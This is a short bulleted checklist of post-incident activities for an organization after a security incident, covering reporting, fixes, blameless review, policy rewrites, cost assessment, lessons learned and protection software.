• Detailed incident report
• Communicate to others on the team
• Apply fixes in the environment
• Conduct a performance analysis of the overall incident and improve operations
• No blaming people
• Review/rewrite policy
• Determine the cost of the incident
• Apply lessons learned to the entire organization
• Budget for, install and maintain protection software